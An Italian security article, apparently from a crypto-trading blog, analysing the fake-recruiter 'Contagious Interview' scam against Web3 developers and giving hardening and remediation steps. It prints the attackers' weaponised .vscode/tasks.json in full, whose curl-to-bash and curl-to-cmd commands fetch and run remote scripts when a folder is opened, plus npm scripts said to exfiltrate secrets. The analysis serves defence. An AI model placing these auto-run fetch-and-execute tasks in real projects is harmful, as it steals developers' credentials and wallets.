Il Colloquio Contagioso: Come Falsi Recruiter Hackerano gli Sviluppatori
Riassunto: Una nuova ondata di attacchi sponsorizzati da stati sta colpendo gli sviluppatori senior nel settore crypto. I truffatori si fingono recruiter o CTO e fanno aprire ai candidati codice dannoso. Questo articolo analizza il caso "Martin Erazo", l'exploit "tasks.json" di VS Code e il "Protocollo di Distruzione" necessario per sopravvivere.
Disclaimer: Questo articolo riporta specifici incidenti di sicurezza informatica che coinvolgono l'impersonificazione di individui reali. I nomi "Martin Erazo" e "Ara Vartanian" si riferiscono a personaggi o identità usate dagli aggressori. Riteniamo che le persone reali con questi nomi siano vittime innocenti di furto d'identità e non siano coinvolte in queste attività malevole.
1. L'Esca Perfetta: La Persona "Martin Erazo"
Inizia con un messaggio che tocca tutti i punti giusti per un ingegnere senior:
- Ruolo: CTO / Lead Architect.
- Budget: 6M$ di finanziamenti assicurati.
- Tech: Web3, AI, Infrastruttura Decentralizzata.
In recenti attacchi confermati, un recruiter che usa il nome "Martin Erazo" contatta via LinkedIn. Il profilo usa il nome e la foto di un vero direttore teatrale, ma la storia lavorativa è falsificata per passare improvvisamente a "IT Project Management" nel 2025 — un classico segno di account hackerato o comprato.
La truffa si muove velocemente. Saltano lo screening HR standard e vanno dritti a un "colloquio tecnico" con il top management — in questo caso, impersonando il vero CTO del settore Ara Vartanian (ora in Limit Break).
Bandiera Rossa: Il nome del progetto cambia costantemente. Il recruiter vende "Betfin" (una piattaforma GameFi), ma il pitch deck fornito è per "SpaceXView" (un progetto metaverso). Questa incoerenza è la prova che i truffatori stanno riciclando asset tra diverse campagne.
2. La Trappola: "Rivedi il Nostro Codice MVP"
Il falso "CTO" afferma di aver bisogno del tuo occhio esperto sul loro codice MVP. Ti inviano un link a una repository GitHub o un file ZIP. Ti mettono fretta per aprirlo durante il colloquio o subito dopo.
È qui che avviene l'attacco.
Sfruttano la tua disponibilità e il tuo ego. Pensi di essere lì per trovare bug nei componenti React. In realtà, il bug è una "feature" progettata per prosciugare i tuoi risparmi.
3. L'Exploit Tecnico: Malware Zero-Click
Gli aggressori usano vulnerabilità "zero-click" o "low-click" mirate agli strumenti di sviluppo. Non hanno bisogno che tu esegua l'app. Hanno solo bisogno che tu apra la cartella.
La Pistola Fumante: .vscode/tasks.json
In questo caso specifico, la repository includeva un file .vscode/tasks.json armato. Questo file dice a VS Code come compilare il progetto.
Il Codice Malevolo:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Questo è l'innesco fatale. Nel momento in cui apri la cartella in VS Code, questo task viene eseguito automaticamente.
- Il Payload: Usa curl per scaricare uno script da
vscodesettingtask.vercel.app— un noto host di malware mascherato da API di impostazioni. - Il Risultato: Lo script viene eseguito in memoria e ruba istantaneamente password di Chrome, cookie di sessione e chiavi SSH.
Piano B: Script package.json
Se l'exploit di VS Code fallisce, piazzano script npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Eseguire npm install o npm start innesca server/server.js — uno script C2 (Command & Control) locale che esfiltra le tue variabili d'ambiente (Chiavi AWS, Seed Wallet) all'aggressore.
4. Bandiere Rosse vs Bandiere Verdi
Come riconoscerlo prima che sia troppo tardi?
Se sei uno sviluppatore, le "repository private" o i file ZIP dovrebbero metterti in massima allerta. Le aziende legittime usano repository pubbliche o compiti a casa tramite piattaforme standard.
Attenzione: Questo non è l'unico modo in cui gli sviluppatori vengono attaccati. Leggi della Trappola del Collaboratore su Discord e come gli Attacchi alla Supply Chain compromettono le dipendenze.
| 🚩 Bandiera Rossa (Scappa) | ✅ Bandiera Verde (Sicuro) |
|---|---|
| Codice Prima: Inviano codice prima di qualsiasi offerta. | Processo Standard: Colloquio prima, codice dopo. |
| Identità Infranta: Il recruiter non ha storia rilevante (es: Artista diventato IT Manager). | Storia Verificata: Carriera LinkedIn coerente. |
| Incoerenza: Il nome del progetto non corrisponde (Betfin vs SpaceXView). | Coerenza: Nome, documenti e sito allineati. |
| Urgenza: "Il CTO sta aspettando", "Apri ora". | Pazienza: Rispettano il tuo tempo e i tuoi impegni. |
| Email Personale: [email protected] o dominio sbagliato. | Email Aziendale: [email protected] (con record MX attivi). |
5. Protocollo di Sicurezza: Come Fare Colloqui in Sicurezza
Se sei uno sviluppatore senior, sarai un bersaglio. Rafforzare il tuo ambiente è obbligatorio.
Protocollo 1: L'Ambiente "Burner" (Usa e Getta)
MAI usare la tua workstation principale per test di codice.
- Macchine Virtuali: Usa VirtualBox o VMWare.
- IDE Cloud: Usa GitHub Codespaces o Gitpod. Sono effimeri e isolati dai file del tuo wallet locale.
Protocollo 2: Audit Forense
Prima di anche solo aprire codice sconosciuto:
- Controlla .vscode/tasks.json: Cerca
runOn: folderOpen. - Controlla package.json: Cerca script preinstall o postinstall sospetti.
- Ricerca Parole Chiave: Fai un grep per
curl,wget,os.homedir(),.ssh,wallet.
Protocollo 3: Rafforzamento di VS Code
Disabilita "Workspace Trust" globalmente.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always.
- Questo costringe VS Code a chiedere il permesso prima di eseguire qualsiasi task a livello di cartella.
6. Rimedio: "Il Protocollo di Distruzione"
Se hai aperto una repository dannosa (come quella inviata dalla persona "Martin Erazo"), assumi di essere compromesso. Ripristinare il sistema non è sufficiente.
- Taglia la Connessione: Scollega il cavo ethernet immediatamente.
- Brucia i Wallet: Le tue chiavi private sono perse. Crea nuovi wallet su un dispositivo pulito (telefono) e sposta i fondi rimanenti. Non usare mai più i vecchi seed.
- Uccidi le Sessioni: Esegui il logout da tutti i dispositivi su Google, GitHub, AWS. Revoca tutte le sessioni attive.
- Audit Chiavi SSH: Controlla le impostazioni di GitHub/GitLab. Gli aggressori spesso aggiungono le loro chiavi SSH per mantenere l'accesso backdoor. Elimina quelle che non riconosci.
- Distruzione Totale (Nuke It): Formatta il drive e reinstalla il sistema operativo. È l'unico modo per essere sicuri al 100% che i rootkit siano spariti.
Conclusione
La truffa del "Colloquio Contagioso" trasforma la tua competenza in un'arma contro di te. Prende di mira la tua volontà di risolvere problemi. Ma nel Web3, la paranoia è una virtù professionale. Verifica ogni identità, metti in sandbox ogni repository e non fidarti mai di un "recruiter" che ha fretta di farti scrivere codice.
Pronto a Mettere in Pratica le Tue Conoscenze?
Inizia a fare trading con fiducia alimentata dall'IA oggi
IniziaArticoli Correlati
Il Lungo Raggiro (Pig Butchering): Come Ti Rubano Cuore e Wallet
Inizia con un SMS 'Numero Sbagliato'. Finisce con la perdita della tua pensione. Un'anatomia del copione psicologico della truffa 'Pig Butchering'.
Non Fare Trading Dove Giochi: Il Caso del Dispositivo Crypto Dedicato
Il tuo PC da gaming è pieno di falle. Il tuo telefono è pieno di tracker. Perché spendere 200$ per un 'Dispositivo Bancario' dedicato è la migliore polizza assicurativa che tu possa comprare.
La Backdoor Nascosta: Perché Devi Revocare i Permessi
Hai disconnesso il wallet, ma l'hacker può ancora svuotarlo. Comprendi come funzionano le 'Approvazioni Illimitate' e come chiudere la tua backdoor digitale.